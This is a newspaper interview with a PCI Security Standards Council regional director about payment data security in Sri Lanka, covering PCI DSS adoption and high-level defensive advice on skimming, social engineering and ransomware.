‘Strong data security foundation starts with people, processes and technology’

PCI Security Standards Council Regional Director India & South Asia Nitin Bhatnagar

The PCI Security Standards Council (PCI SSC) is a global forum that brings together payments industry stakeholders to develop and drive adoption of data security standards and resources for safe payments worldwide.

It leads a global, cross-industry effort to increase payment security by providing industry-driven, flexible and effective data security standards and programs that help businesses detect, mitigate and prevent cyber attacks and breaches. In this interview with PCI Security Standards Council Regional Director India & South Asia Nitin Bhatnagar shares key insights to latest developments in and challenges for global payment industry and fintechs as well as Sri Lanka. Nitin will also speak at the Daily FT-CICRA Holdings 9th Annual Cyber Security Summit CEOs Breakfast Forum today and full day forum tomorrow, both at the Cinnamon Grand, Oak Room.

Q: What are general security and compliance challenges for the Payment Industry and Fintech’s?

A: Cybersecurity is one of the significant national security challenges that countries face all over the world. Cyberattacks and data breaches on payment infrastructure are a global problem. Some of the common challenges here in Sri Lanka are:

• Companies in the region are more susceptible to attacks as they lag behind when it comes to incident detection and breach response time.
• Overall IT Security budget in Sri Lanka for security is only 5-10% compared to 25-30% for some developed countries. With restricted budgets, innovation and quicker decision-making take a backseat.
• The gap of skilled cybersecurity professionals in the country.

Overall, there is a need for a mindset change. Organisations need to become aware of security and take it seriously because criminals take it seriously – their sole objective is to break into an organisation, steal data and monetise it.

Q: Can you please explain the present and evolving global scenario in data security?

A: With a strong data security foundation, you can protect your customer payment data and prevent data breaches that can put you out of business. A strong data security foundation starts with people, processes and technology.  The PCI Data Security Standard (PCI DSS) applies to all entities that store, process, and/or transmit cardholder data. It covers technical and operational practices for system components included in or connected to environments with cardholder data. If you accept or process payment cards, PCI DSS applies to you. By focusing on security as a continuous process, organisations will have greater assurance in their PCI DSS v4.0 implementations and reduce the risk of security incidents and breaches.

Q:  How do you see the Sri Lankan Payment Industry and Fintech market from a data security aspect?

A: Sri Lanka has been low on awareness and adoption of payment data security standards. Effective implementation of PCI Standards to protect payment data can only be achieved with properly trained staff, having the right processes in place and through the right use of technology.

Q: Are there any suggestions you would like to forward to enhance the data security of the Sri Lanka Payment Industry? 

A: A less-cash society seems fast approaching, and that’s good news for Sri Lanka.  The road to stronger payment security involves global collaboration, organisations should start prioritising data security as an important element of their day-to-day business activities. CFO/CXO’s investing in cyber security is equally important. Getting employees trained and improving on cyber hygiene will help organisations take steps in the right direction. Becoming a PCI SSC Associate Participating Organisation (PO) can help better protect your organisation from cybercrime by being part of a community of payment professionals. Being an APO, your organisation will also have access to free and discounted training and regional events, making it a cost-effective way to invest in cybersecurity.

Q: What kinds of trends are you seeing in the payment industry in Sri Lanka? 

A: We are already seeing some great steps being taken to address some of the most important issues in payment card security in Sri Lanka. Industry collaboration both domestically and globally continues to be hugely important to help tackle the growing threat of cybercrime. The potent combination of sharing best practices through the PCI SSC APO program, global industry collaboration, and enhancements to payments infrastructure, all continue to help protect the growth of the payment industry and combat cybercrime in Sri Lanka.  

Q: What are the opportunities? And what are the threats to payment security there?

A: Online digital skimming, Social Engineering, and Ransomware are three types of cyberattacks that have the potential to disrupt business operations. Online digital skimming is used to steal personal data from online payment forms, such as email addresses, passwords, and credit card numbers. To help prevent these attacks, companies should adopt the appropriate data security standards and encourage employees to follow them. 

Businesses should also invest in employee training to ensure that security is ingrained in their company’s culture as well as their devices. Keeping all company software, hardware, and tools up to date and patched can also help minimise the risk of falling victim to a cyberattack. Secondly, social engineering is the use of psychological manipulation to gain access to systems or data, relying on human trust and goodwill to perform a successful attack. 

In social engineering attacks, fraudsters will attempt to persuade users to make security errors or share critical information, often over email. It comes in five forms including baiting, scareware, pretexting, phishing, and spear phishing. To mitigate the risk of falling prey to these attacks, individuals should ensure that they do not open emails and attachments from unknown or suspicious sources. They should also use Multi-factor Authentication (MFA) to make it more difficult for cybercriminals to access their information.

 Finally, ransomware is where cybercriminals prevent a user from accessing their information by locking their computer or encrypting their files until a ransom is paid. Maintaining strong passwords and backing up business-critical information can help minimise the risk of a successful ransomware attack. Additionally, individuals should also keep their systems up to date and avoid downloading or installing anything from unknown sources.  

Q: What is the role of PCI SSC and what it is doing to enhance the Payment Industry and Fintech industry of a country like Sri Lanka?

A: The PCI Security Standards Council (PCI SSC) is a global forum that brings together payments industry stakeholders for the ongoing development, enhancement, storage, dissemination, and implementation of security standards for account data protection. In Sri Lanka, our main objective has been to drive awareness and encourage the adoption of the PCI security standards for payment card security. 

We have been working closely with Banks, regulators, law enforcement, and other key stakeholders across the Sri Lanka payment ecosystem, to not only promote PCI standards but also help the ever-growing payments industry focus on security.